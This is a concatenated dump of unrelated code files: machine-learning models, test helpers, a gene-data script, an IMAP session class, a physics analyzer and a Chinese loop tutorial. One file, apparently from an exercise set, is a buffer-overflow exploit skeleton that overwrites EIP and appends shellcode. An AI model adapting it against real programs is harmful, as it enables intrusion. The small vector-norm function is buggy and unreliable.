ResNetEncoderDecoder(EncoderDecoder):\n @classmethod\n def feature_extractor(cls):\n resnet = models.resnet18(pretrained=True)\n return nn.Sequential(*list(resnet.children())[4:-2])\n\n\nif __name__ == '__main__':\n import torchsummary\n\n net = ResNetEncoderDecoder(32)\n torchsummary.summary(net, input_size=(1, 32, 200))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522075413","text":"import os\nimport socket\nimport time\n\nimport docker\nimport responses\n\nfrom pytest_mock_resources.compat import functools\n\nIN_CI = os.getenv(\"CI\") == \"true\" # type: bool\n\n\n@functools.lru_cache()\ndef get_docker_host():\n host = \"host.docker.internal\"\n try:\n socket.gethostbyname(host)\n return host\n except socket.gaierror:\n return os.environ.get(\"PYTEST_MOCK_RESOURCES_HOST\", \"localhost\")\n\n\nclass ContainerCheckFailed(Exception):\n \"\"\"Unable to connect to a Container.\n \"\"\"\n\n\ndef get_container_fn(name, image, ports, environment, check_fn):\n def wrapped():\n # XXX: moto library may over-mock responses. SEE: https://github.com/spulec/moto/issues/1026\n responses.add_passthru(\"http+docker\")\n\n def retriable_check_fn(retries):\n while retries:\n retries -= 1\n try:\n check_fn()\n return\n except Exception:\n if not retries:\n raise\n time.sleep(1)\n\n try:\n container = None\n try:\n retriable_check_fn(1)\n except ContainerCheckFailed:\n client = docker.from_env(version=\"auto\")\n container = client.containers.run(\n image, ports=ports, environment=environment, detach=True, remove=True\n )\n retriable_check_fn(20)\n\n yield\n except Exception:\n raise\n\n finally:\n if container:\n container.kill()\n\n wrapped.__name__ = name\n\n return wrapped\n\n\n# flake8: noqa\nfrom pytest_mock_resources.container.mongo import _mongo_container # isort:skip\nfrom pytest_mock_resources.container.postgres import _postgres_container # isort:skip\nfrom pytest_mock_resources.container.redis import _redis_container # isort:skip\nfrom pytest_mock_resources.container.redshift import _redshift_container # isort:skip\nfrom pytest_mock_resources.container.mysql import _mysql_container # isort:skip\n","sub_path":"src/pytest_mock_resources/container/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"572052090","text":"import threading\nimport time\nimport schedule\n\ndef MyThread1():\n while True:\n \tprint ('Hola')\n \ttime.sleep(20)\n\ndef MyThread2():\n\tprint ('iniciada hebra 2')\n\twhile True:\n\t\tschedule.run_pending()\n\t\ttime.sleep(1)\n\ndef job():\n\tprint ('lasodkjfalksdjflñaksdjfñlaskdjfñalskd scheduler')\n\n\n\nschedule.every(2).minutes.do(job)\n\nt1 = threading.Thread(target=MyThread1, args=[])\nt2 = threading.Thread(target=MyThread2, args=[])\n\nt1.start()\nt2.start()\n\n\n\nwhile True:\n\tprint ('asdf')\n\ttime.sleep(30)\n","sub_path":"thread_test.py","file_name":"thread_test.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"177781690","text":"#!/usr/local/bin/python3\n\nimport os, subprocess, shutil\n\nflygenedata = open(\"data.csv\")\n\nfor geneline in flygenedata :\n# Make each line into a list, using split() and comma as delimiter\n gene_info = geneline.split(\",\")\n# Define our variables from the split()-generated list elements\n species = gene_info[0]\n geneseqs = gene_info[1].upper()\n seqlengths = len(gene_info[1])\n genenames = gene_info[2]\n expressionlevel = int(gene_info[3])\n# AT content calculations, default status is \"low\"\n atcontent = (geneseqs.count('A')+geneseqs.count('T'))/seqlengths\n atstatus = \"low\"\n if(atcontent >= 0.45 and atcontent <= 0.65) :\n atstatus=\"medium\"\n if(atcontent>0.65) :\n atstatus=\"high\" \n# Answer the questions, also including a \"condition fail\" output for checking purposes\n if \"melanogaster\" in species or \"simulans\" in species:\n print(\"Question 1 (melanogaster or simulans): \"+ species + \" \"+genenames)\n else :\n print(\"Question 1 (FAIL): \"+ species + \" \"+genenames)\n if seqlengths > 90 and seqlengths < 110:\n print(\"Question 2 (seqlength >90 and <110): \"+ species + \" \"+genenames)\n else :\n print(\"Question 2 (FAIL): \"+ species + \" \"+genenames)\n if atcontent < 0.5 and expressionlevel > 200:\n print(\"Question 3 (AT content <0.5, expr > 200): \"+ species + \" \"+genenames)\n else :\n print(\"Question 3 (FAIL): \"+ species + \" \"+genenames)\n if (genenames.startswith(\"k\") or genenames.startswith(\"h\")) and (\"Drosophila melanogaster\" not in species) :\n print(\"Question 4 (names start with k or h, not melanogaster): \" + species + \" \" + genenames)\n else :\n print(\"Question 4 (FAIL): \" + species + \" \" + genenames)\n print(\"Question 5 (AT content status): \" + genenames + \" \" + atstatus)\n\n\n\n\n","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"573023846","text":"#!/usr/bin/python3\n\n\nfrom pwn import *\n\nshellcode = b\"\"\n\n## Control EIP\n\nbuffer = b''\nbuffer += b'A'*100\nbuffer += p32(0xdeadbeef) #EIP \nbuffer += b'B'*100\n\n\n# Exploit (the magic happen here)\n\nexploit = buffer\nexploit += shellcode\nexploit += b'B'*200 #...\n\n\n## Write to binary file\n\nf = open(\"exploit.bin\",\"wb\")\nf.write(exploit)\nf.close()\n\n\nprint(\"Exploit is ready !\\n Use `cat exploit.bin - | ./` to use your exploit.\")\n\n","sub_path":"exercices/exploit_squeleton.py","file_name":"exploit_squeleton.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359851400","text":"\nfrom abc import abstractmethod\nfrom asyncio import shield\nfrom typing import Tuple, Optional, FrozenSet, Iterable, Sequence, List\nfrom typing_extensions import Protocol\n\nfrom pymap.concurrent import Event\nfrom pymap.config import IMAPConfig\nfrom pymap.exceptions import MailboxNotFound, MailboxReadOnly\nfrom pymap.flags import FlagOp, SessionFlags, PermanentFlags\nfrom pymap.listtree import ListTree\nfrom pymap.mailbox import MailboxSnapshot\nfrom pymap.parsing.specials import SequenceSet, SearchKey, \\\n FetchAttribute, FetchRequirement\nfrom pymap.parsing.specials.flag import Flag, Seen\nfrom pymap.parsing.response.code import AppendUid, CopyUid\nfrom pymap.interfaces.message import AppendMessage\nfrom pymap.interfaces.session import SessionInterface\nfrom pymap.search import SearchParams, SearchCriteriaSet\nfrom pymap.selected import SelectedMailbox\n\nfrom .mailbox import MailboxDataInterface, MailboxSetInterface, MessageT\n\n__all__ = ['BaseSession']\n\n\nclass BaseSession(SessionInterface, Protocol[MessageT]):\n \"\"\"Base implementation of\n :class:`~pymap.interfaces.session.SessionInterface` intended for use by\n most backends.\n\n \"\"\"\n\n @property\n @abstractmethod\n def config(self) -> IMAPConfig:\n ...\n\n @property\n @abstractmethod\n def mailbox_set(self) \\\n -> MailboxSetInterface[MailboxDataInterface[MessageT]]:\n ...\n\n async def _load_updates(self, selected: Optional[SelectedMailbox],\n mbx: Optional[MailboxDataInterface[MessageT]]) \\\n -> Optional[SelectedMailbox]:\n if selected:\n if not mbx or selected.name != mbx.name:\n try:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n except MailboxNotFound:\n selected.set_deleted()\n return selected\n return await mbx.update_selected(selected)\n return selected\n\n @classmethod\n def _find_selected(cls, selected: Optional[SelectedMailbox],\n mbx: MailboxDataInterface[MessageT]) \\\n -> Optional[SelectedMailbox]:\n if selected and selected.name == mbx.name:\n return selected\n return mbx.selected_set.any_selected\n\n async def list_mailboxes(self, ref_name: str, filter_: str,\n subscribed: bool = False,\n selected: SelectedMailbox = None) \\\n -> Tuple[Iterable[Tuple[str, Optional[str], Sequence[bytes]]],\n Optional[SelectedMailbox]]:\n delimiter = self.mailbox_set.delimiter\n if filter_:\n list_tree = ListTree(delimiter).update('INBOX')\n if subscribed:\n list_tree.update(*await self.mailbox_set.list_subscribed())\n else:\n list_tree.update(*await self.mailbox_set.list_mailboxes())\n ret = [(entry.name, delimiter, entry.attributes)\n for entry in list_tree.list_matching(ref_name, filter_)]\n else:\n ret = [(\"\", delimiter, [b'Noselect'])]\n return ret, await self._load_updates(selected, None)\n\n async def get_mailbox(self, name: str, selected: SelectedMailbox = None) \\\n -> Tuple[MailboxSnapshot, Optional[SelectedMailbox]]:\n mbx = await self.mailbox_set.get_mailbox(name)\n snapshot = await mbx.snapshot()\n return snapshot, await self._load_updates(selected, mbx)\n\n async def create_mailbox(self, name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.add_mailbox(name)\n return await self._load_updates(selected, None)\n\n async def delete_mailbox(self, name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.delete_mailbox(name)\n return await self._load_updates(selected, None)\n\n async def rename_mailbox(self, before_name: str, after_name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.rename_mailbox(before_name, after_name)\n return await self._load_updates(selected, None)\n\n async def subscribe(self, name: str, selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox('INBOX')\n await self.mailbox_set.set_subscribed(name, True)\n return await self._load_updates(selected, mbx)\n\n async def unsubscribe(self, name: str, selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox('INBOX')\n await self.mailbox_set.set_subscribed(name, False)\n return await self._load_updates(selected, mbx)\n\n async def append_messages(self, name: str,\n messages: Sequence[AppendMessage],\n selected: SelectedMailbox = None) \\\n -> Tuple[AppendUid, Optional[SelectedMailbox]]:\n mbx = await self.mailbox_set.get_mailbox(name, try_create=True)\n if mbx.readonly:\n raise MailboxReadOnly(name)\n dest_selected = self._find_selected(selected, mbx)\n uids: List[int] = []\n for append_msg in messages:\n msg = await mbx.add(append_msg, recent=not dest_selected)\n if dest_selected:\n dest_selected.session_flags.add_recent(msg.uid)\n uids.append(msg.uid)\n mbx.selected_set.updated.set()\n return (AppendUid(mbx.uid_validity, uids),\n await self._load_updates(selected, mbx))\n\n async def select_mailbox(self, name: str, readonly: bool = False) \\\n -> Tuple[MailboxSnapshot, SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(name)\n selected = SelectedMailbox(name, readonly or mbx.readonly,\n PermanentFlags(mbx.permanent_flags),\n SessionFlags(mbx.session_flags),\n selected_set=mbx.selected_set)\n if not selected.readonly:\n await mbx.claim_recent(selected)\n snapshot = await mbx.snapshot()\n return snapshot, await mbx.update_selected(selected)\n\n async def check_mailbox(self, selected: SelectedMailbox, *,\n wait_on: Event = None,\n housekeeping: bool = False) -> SelectedMailbox:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n if housekeeping:\n await shield(mbx.cleanup())\n if wait_on is not None:\n either_event = wait_on.or_event(mbx.selected_set.updated)\n await either_event.wait()\n return await mbx.update_selected(selected)\n\n async def fetch_messages(self, selected: SelectedMailbox,\n sequence_set: SequenceSet,\n attributes: FrozenSet[FetchAttribute]) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n req = FetchRequirement.reduce({attr.requirement\n for attr in attributes})\n ret = [(seq, msg) async for seq, msg\n in mbx.find(sequence_set, selected, req)]\n if not selected.readonly and any(attr.set_seen for attr in attributes):\n seen_set = frozenset([Seen])\n await mbx.update_flags([msg for _, msg in ret],\n seen_set, FlagOp.ADD)\n mbx.selected_set.updated.set()\n return ret, await mbx.update_selected(selected)\n\n async def search_mailbox(self, selected: SelectedMailbox,\n keys: FrozenSet[SearchKey]) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n req = FetchRequirement.reduce({key.requirement for key in keys})\n ret: List[Tuple[int, MessageT]] = []\n params = SearchParams(selected,\n disabled=self.config.disable_search_keys)\n search = SearchCriteriaSet(keys, params)\n async for seq, msg in mbx.find(search.sequence_set, selected, req):\n if search.matches(seq, msg):\n ret.append((seq, msg))\n return ret, await mbx.update_selected(selected)\n\n async def expunge_mailbox(self, selected: SelectedMailbox,\n uid_set: SequenceSet = None) -> SelectedMailbox:\n if selected.readonly:\n raise MailboxReadOnly(selected.name)\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n if not uid_set:\n uid_set = SequenceSet.all(uid=True)\n expunge_uids = await mbx.find_deleted(uid_set, selected)\n await mbx.delete(expunge_uids)\n mbx.selected_set.updated.set()\n return await mbx.update_selected(selected)\n\n async def copy_messages(self, selected: SelectedMailbox,\n sequence_set: SequenceSet,\n mailbox: str) \\\n -> Tuple[Optional[CopyUid], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n dest = await self.mailbox_set.get_mailbox(mailbox, try_create=True)\n if dest.readonly:\n raise MailboxReadOnly(mailbox)\n req = FetchRequirement.BODY\n dest_selected = self._find_selected(selected, dest)\n uids: List[Tuple[int, int]] = []\n async for _, msg in mbx.find(sequence_set, selected, req):\n if not msg.expunged:\n source_uid = msg.uid\n msg = await dest.add(msg.append_msg, recent=not dest_selected)\n if dest_selected:\n dest_selected.session_flags.add_recent(msg.uid)\n uids.append((source_uid, msg.uid))\n dest.selected_set.updated.set()\n return (CopyUid(dest.uid_validity, uids),\n await mbx.update_selected(selected))\n\n async def update_flags(self, selected: SelectedMailbox,\n sequence_set: SequenceSet,\n flag_set: FrozenSet[Flag],\n mode: FlagOp = FlagOp.REPLACE) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n if selected.readonly:\n raise MailboxReadOnly(selected.name)\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n permanent_flags = selected.permanent_flags & flag_set\n messages: List[Tuple[int, MessageT]] = []\n async for msg_seq, msg in mbx.find(sequence_set, selected):\n if not msg.expunged:\n selected.session_flags.update(msg.uid, flag_set, mode)\n messages.append((msg_seq, msg))\n await mbx.update_flags([msg for _, msg in messages],\n permanent_flags, mode)\n mbx.selected_set.updated.set()\n return messages, await mbx.update_selected(selected)\n","sub_path":"pymap/backend/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":11098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"388816129","text":"\nimport operator \nimport itertools\nimport copy\nimport types\n\nfrom ROOT import TLorentzVector\n\nfrom CMGTools.RootTools.fwlite.Analyzer import Analyzer\nfrom CMGTools.RootTools.fwlite.Event import Event\nfrom CMGTools.RootTools.statistics.Counter import Counter, Counters\nfrom CMGTools.RootTools.fwlite.AutoHandle import AutoHandle\nfrom CMGTools.RootTools.physicsobjects.Lepton import Lepton\nfrom CMGTools.RootTools.physicsobjects.Tau import Tau\n\nfrom CMGTools.RootTools.utils.DeltaR import deltaR, deltaPhi, bestMatch\n \nclass ttHTauAnalyzer( Analyzer ):\n\n \n def __init__(self, cfg_ana, cfg_comp, looperName ):\n super(ttHTauAnalyzer,self).__init__(cfg_ana,cfg_comp,looperName)\n\n #----------------------------------------\n # DECLARATION OF HANDLES OF LEPTONS STUFF \n #----------------------------------------\n def declareHandles(self):\n super(ttHTauAnalyzer, self).declareHandles()\n self.handles['taus'] = AutoHandle( ('cmgTauSel',''),'std::vector')\n\n\n def beginLoop(self):\n super(ttHTauAnalyzer,self).beginLoop()\n self.counters.addCounter('events')\n count = self.counters.counter('events')\n count.register('all events')\n count.register('has >=1 tau at preselection')\n count.register('has >=1 selected taus')\n count.register('has >=1 loose taus')\n count.register('has >=1 inclusive taus')\n\n #------------------\n # MAKE LEPTON LISTS\n #------------------\n def makeTaus(self, event):\n event.selectedTaus = []\n event.looseTaus = []\n event.inclusiveTaus = []\n\n #get all\n alltaus = map( Tau, self.handles['taus'].product() )\n\n foundTau = False\n for tau in alltaus:\n tau.associatedVertex = event.goodVertices[0]\n tau.lepVeto = False\n if self.cfg_ana.vetoLeptons:\n for lep in event.selectedLeptons:\n if deltaR(lep.eta(), lep.phi(), tau.eta(), tau.phi()) < self.cfg_ana.leptonVetoDR:\n tau.lepVeto = True\n if tau.lepVeto: continue\n if tau.pt() < self.cfg_ana.ptMin: continue\n if abs(tau.dxy()) > 0.5 or abs(tau.dz()) > 1.0: continue\n foundTau = True\n def id3(tau,X):\n \"\"\"Create an integer equal to 1-2-3 for (loose,medium,tight)\"\"\"\n return tau.tauID(X%\"Loose\") + tau.tauID(X%\"Medium\") + tau.tauID(X%\"Tight\")\n tau.idMVA2 = id3(tau, \"by%sIsolationMVA2\")\n tau.idCI3hit = id3(tau, \"by%sCombinedIsolationDeltaBetaCorr3Hits\")\n #print \"Tau pt %5.1f: idMVA2 %d, idCI3hit %d, %s, %s\" % (tau.pt(), tau.idMVA2, tau.idCI3hit, tau.tauID(self.cfg_ana.tauID), tau.tauID(self.cfg_ana.tauLooseID))\n if tau.tauID(self.cfg_ana.tauID):\n event.selectedTaus.append(tau)\n event.inclusiveTaus.append(tau)\n elif tau.tauID(self.cfg_ana.tauLooseID):\n event.looseTaus.append(tau)\n event.inclusiveTaus.append(tau)\n\n event.selectedTaus.sort(key = lambda l : l.pt(), reverse = True)\n event.looseTaus.sort(key = lambda l : l.pt(), reverse = True)\n self.counters.counter('events').inc('all events')\n if foundTau: self.counters.counter('events').inc('has >=1 tau at preselection')\n if len(event.selectedTaus): self.counters.counter('events').inc('has >=1 selected taus')\n if len(event.looseTaus): self.counters.counter('events').inc('has >=1 loose taus')\n if len(event.inclusiveTaus): self.counters.counter('events').inc('has >=1 inclusive taus')\n def process(self, iEvent, event):\n self.readCollections( iEvent )\n self.makeTaus(event)\n return True\n","sub_path":"CMGTools/TTHAnalysis/python/analyzers/ttHTauAnalyzer.py","file_name":"ttHTauAnalyzer.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"322615155","text":"import math\ndef calcula_norma(vetor):\n tamanho=0\n dimensao=len(vetor)\n while dimensao>=1:\n tamanho=(tamanho**2+vetor[dimensao]**2)**(1/2)\n dimensao=dimensao-1\n if dimensao==1:\n return math.fabs(vetor[0])\n else:\n \treturn tamanho","sub_path":"backup/user_312/ch7_2019_03_14_19_55_44_403709.py","file_name":"ch7_2019_03_14_19_55_44_403709.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115055991","text":"from django.conf.urls import url\n\nfrom authentication.views import (thank_you, login_view, logout_view,\n RegistrationView)\n\n\nurlpatterns = [\n url(r'^registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^registration/thank_you/$', thank_you, name='thank_you'),\n\n url(r'^login/$', login_view, name='login'),\n url(r'^logout/$', logout_view, name='logout'),\n]\n","sub_path":"testtask_project/testtask_project/apps/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"48796174","text":"import sys\nimport os\nimport math\nimport itertools\n\ndef read_csv(filepath):\n\t'''Read transactions from csv_file specified by filepath\n\tArgs:\n\t\t\tfilepath (str): the path to the file to be read\n\n\tReturns:\n\t\t\tlist: a list of lists, where each component list is a list of string representing a transaction\n\n\t'''\n\n\ttransactions = []\n\twith open(filepath, 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\ttransactions.append(line.strip().split(',')[:-1])\n\treturn transactions\n\ndef generateItemSetWithMinSup(transactionsListSet, itemLists, minsup):\n\tresult = list()\n\tfor itemList in itemLists:\n\t\tcount = 0\n\t\tfor transaction in transactionsListSet:\n\t\t\tif all(elem in transaction for elem in itemList):\n\t\t\t\tcount = count+1\n\t\tif count/len(transactionsListSet) >= minsup:\n\t\t\titemList.sort()\n\t\t\tresult.append(itemList)\n\treturn result\n\ndef generateCandiateSet(frequentItemLists, length):\n\tcandiate = []\n\tnumbers = len(frequentItemLists)\n\tif length == 2:\n\t\tfor i in range(numbers -1):\n\t\t\tfor j in range(i+1,numbers):\n\t\t\t\tc = []\n\t\t\t\tc.append(frequentItemLists[i][0])\n\t\t\t\tc.append(frequentItemLists[j][0])\n\t\t\t\tc.sort()\n\t\t\t\tcandiate.append(c)\n\t\treturn candiate\n\n\tfor first in range(numbers-1):\n\t\tfor second in range(first + 1, numbers):\n\t\t\tlist1 = frequentItemLists[first]\n\t\t\tlist2 = frequentItemLists[second]\n\t\t\tc = []\n\t\t\tlist1.sort()\n\t\t\tlist2.sort()\n\t\t\tisNeedMerge = True\n\t\t\tfor i in range(length - 2):\n\t\t\t\tif list1[i] != list2[i]:\n\t\t\t\t\tisNeedMerge = False\n\t\t\t\t\tbreak\n\t\t\tif isNeedMerge:\n\t\t\t\tfor item in list1:\n\t\t\t\t\tc.append(item)\n\t\t\t\tc.append(list2[length-2])\n\t\t\t\tc.sort()\n\t\t\tif c != []:\n\t\t\t\tcandiate.append(c)\n\t\t\t\tc = []\n\treturn candiate\n\n# To be implemented\ndef generate_frequent_itemset(transactions, minsup):\n\tresult = list()\n\tfrequent_itemset = dict()\n\ttransactionsListSet = list()\n\titemSet = set()\n\tfor transaction in transactions:\n\t\ttransactionsListSet.append(transaction)\n\t\tfor item in transaction:\n\t\t\titemSet.add(item)\n\ttemp_list = list()\n\tfor item in itemSet:\n\t\ttemp_list.append([item])\n\tone_item_frequentset = generateItemSetWithMinSup(transactionsListSet, temp_list, minsup)\n\tk = 1\n\tcurrent_frequent_set = one_item_frequentset\n\twhile len(current_frequent_set) != 0:\n\t\tfrequent_itemset[k] = current_frequent_set\n\t\tfor item in current_frequent_set:\n\t\t\tresult.append(item)\n\t\tk = k+1\n\t\tcandiateSet = generateCandiateSet(current_frequent_set, k)\n\t\tcurrent_frequent_set = generateItemSetWithMinSup(transactionsListSet, candiateSet, minsup)\n\treturn result\n\n\n\ndef findsubsets(originSet,subSetLength):\n\treturn set(itertools.combinations(originSet,subSetLength))\n# To be implemented\ndef generate_association_rules(transactions, minsup, minconf):\n\t'''Mine the association rules from transactions\n\tArgs:\n\t\t\ttransactions (list): a list of lists, where each component list is a list of string representing a transaction\n\t\t\tminsup (float): specifies the minsup for mining\n\t\t\tminconf (float): specifies the minconf for mining\n\n\tReturns:\n\t\t\tlist: a list of association rule, each rule is represented as a list of string\n\n\tExample:\n\t\t\tOutput: [['root vegetables', 'rolls/buns','=>', 'other vegetables'],['root vegetables', 'yogurt','=>','other vegetables']]\n\t\t\tThe meaning of the output is as follows: {root vegetables, rolls/buns} => {other vegetables} and {root vegetables, yogurt} => {other vegetables} are the two associated rules found by the algorithm\n\n\n\t'''\n\tresult = []\n\tfrequentItemSet = generate_frequent_itemset(transactions,minsup)\n\tfor item in frequentItemSet:\n\t\tcount = 1\n\t\tlength = len(item)\n\t\twhile count < length:\n\t\t\tsubsets = findsubsets(set(item),count)\n\t\t\t# need check all items subsets using confidence\n\t\t\tcount = count + 1\n\n\t\t\tfor subset in subsets:\n\t\t\t\tcount_x = 0\n\t\t\t\tcount_y = 0\n\t\t\t\tx = []\n\t\t\t\ty = []\n\t\t\t\tfor element in subset:\n\t\t\t\t\tx.append(element)\n\t\t\t\tfor transaction in transactions:\n\t\t\t\t\tif all(i in transaction for i in x):\n\t\t\t\t\t\tcount_x = count_x + 1\n\t\t\t\t\tif all(i in transaction for i in item):\n\t\t\t\t\t\tcount_y = count_y + 1\n\t\t\t\tif count_y >= minconf * count_x:\n\t\t\t\t\tfor i in item:\n\t\t\t\t\t\tif i not in x:\n\t\t\t\t\t\t\ty.append(i)\n\t\t\t\t\ttemp = list()\n\t\t\t\t\tfor i in x:\n\t\t\t\t\t\ttemp.append(i)\n\t\t\t\t\ttemp.append('=>')\n\t\t\t\t\tfor i in y:\n\t\t\t\t\t\ttemp.append(i)\n\t\t\t\t\tresult.append(temp)\n\n\treturn result\n\n\ndef main():\n\t# this is for debug in ide\n\t#sys.argv = ['', 'C:\\\\Users\\\\anyone\\\\Desktop\\\\python\\\\data-mining\\\\Association Rule Mining\\\\Data\\\\test.csv', 0.02,0.1]\n\tif len(sys.argv) != 3 and len(sys.argv) != 4:\n\t\tprint(\"Wrong command format, please follwoing the command format below:\")\n\t\tprint(\"python assoc-rule-miner-template.py csv_filepath minsup\")\n\t\tprint(\"python assoc-rule-miner-template.py csv_filepath minsup minconf\")\n\t\texit(0)\n\n\tif len(sys.argv) == 3:\n\t\ttransactions = read_csv(sys.argv[1])\n\t\tresult = generate_frequent_itemset(transactions, float(sys.argv[2]))\n\n\t\t# store frequent itemsets found by your algorithm for automatic marking\n\t\twith open('.'+os.sep+'Output_1'+os.sep+'frequent_itemset_result.txt', 'w') as f:\n\t\t\tfor items in result:\n\t\t\t\toutput_str = '{'\n\t\t\t\tfor e in items:\n\t\t\t\t\toutput_str += e\n\t\t\t\t\toutput_str += ','\n\n\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\toutput_str += '}\\n'\n\t\t\t\tf.write(output_str)\n\telif len(sys.argv) == 4:\n\t\ttransactions = read_csv(sys.argv[1])\n\t\tminsup = float(sys.argv[2])\n\t\tminconf = float(sys.argv[3])\n\t\tresult = generate_association_rules(transactions, minsup, minconf)\n\n\t\t# store associative rule found by your algorithm for automatic marking\n\n\t\twith open('.'+os.sep+'Output_1'+os.sep+'assoc-rule-result.txt', 'w') as f:\n\t\t\tfor items in result:\n\t\t\t\toutput_str = '{'\n\t\t\t\tfor e in items:\n\t\t\t\t\tif e == '=>':\n\t\t\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\t\t\toutput_str += '} => {'\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput_str += e\n\t\t\t\t\t\toutput_str += ','\n\n\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\toutput_str += '}\\n'\n\t\t\t\tf.write(output_str)\n\n\nmain()\n","sub_path":"code/H2_2/assoc-rule-miner-template_1.py","file_name":"assoc-rule-miner-template_1.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"587683020","text":"\"\"\"\n二、循环\n1. for\nfor 循环:依据任意序列中的子项,按其在序列中的顺序进行迭代\n\"\"\"\n# 背景:\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n\n\"\"\"\nfor循环的语法\n# 变量名:是序列中的每一个元素\n迭代对象:序列(字符串、字节、列表、元组)和其他可迭代对象\n遍历:指将一个可迭代的对象每个元素都查看一遍。\n\nfor 变量名 in 序列(字符串、字节、列表、元组)和其他可迭代对象:\n 循环体\n\"\"\"\n# 使用for循环输出5次hello world\n# for i in \"11111\":\n# print(\"hello world\")\n\n# 可迭代对象可以换成其他的,只要满足可迭代对象是五次就可以。\n# for i in \"12345\":\n# print(\"开始:\")\n# print(\"hello world\")\n\n# 将可迭代对象中的每一个元素都加1\nfor i in \"11111\":\n # print(i,type(i))\n n=int(i)\n n+=1\n print(n)\n\n# 1+2+3+4+5\ns=0\nfor i in \"12345\":\n n=int(i)\n s=s+n\nprint(s)\n\n#1+2+3+...100\n# range(start,end,step)函数:能够产生一个列表\n# 包含start不包含end\n# step:默认1:方向是从左到右\n# print(range(1,5)) # [1,2,3,4] python2x\n# print(list(range(1,5))) python3x\na=range(1,5)\nprint(type(a))\nfor i in a:\n print(i)\n\nprint(list(range(1,101)))\n\n# 1+...+100累加和\ns=0\nfor i in range(1,101):\n # s=s+i\n s+=i\nprint(s)\n\n# 练习\n\"\"\"\n1. 定义字符串、定义字节,使用for循环对其进行遍历,计算长度\n\n\"\"\"\ns=\"hello world python\"\nl=0\nfor i in s:\n print(i)\n l=l+1\nprint(\"通过for循环计算出的l={}\".format(l))\n# 0 1 2 3 ... len(s)-1\n# for i in range(0,len(s)):\nfor i in range(len(s)):# 简化\n print(\"通过索引访问每一个元素\",s[i])\n\n\n# 字节的遍历是ascii\n# 通过索引访问的也是ascii\nl1=0\nb=b\"helloworldpython\"\nfor i in b:\n l1+=1\n # print(i)\nprint(\"通过for循环计算出的l1={}\".format(l1))\nfor i in range(len(b)):\n print(\"通过索引的方式访问字节元素\",b[i])\n\n\n#2. 输出1-100以内���有的奇数 使用两种办法\n# print(list(range(1,101,2)))\nfor i in range(1,101):\n if i%2!=0:\n print(i,end=\" \")\nprint()\n#3.输出1-100以内所有的偶数\nfor i in range(1,101):\n if i%2==0:\n print(i,end=\" \")\n\nprint()\n#4.有一些列的温度数 30 50 66 99 58 20代表华氏温度\n #希望将这些温度变成摄氏温度: 摄氏温度=(华氏温度-32)/1.8\n# (1)需要将每个温度变成摄氏温度\n#(2)希望得到的结果仍然是字符串\n\"\"\"\n思路:\n(1)如何将字符串处理成单个元素(温度),split(\",\")\n (2) 使用for循环处理每一个温度\n 处理之前需要将温度转换float\n(3)+可以拼接字符串\n format也能组装字符串\n\"\"\"\ns=\"30,50,66,99,58,20\"\nprint(s.split(\",\"))\nt=s.split(\",\")\na=\"\"\nfor i in t:\n # print(i)摄氏温度=(华氏温度-32)/1.8\n x=(float(i)-32)/1.8\n # print(x)\n # a+=str(x)+\",\"\n a+=\"{},\".format(x)\ns=a.rstrip(\",\")\nprint(s)\ns=\"1.2,1.5,1.65892.......\"\n\n\n# 2.循环的嵌套\n\"\"\"\n语法:\nfor i in 外循环对象:\n for j in 内循环对象:\n 循环体\n外循环每执行一次,内循环都会完整的执行一轮。\n\"\"\"\n#打印星星*\n# print(\"******\")\n# print(\"*\"*6)\n#\n# for i in range(6):\n# 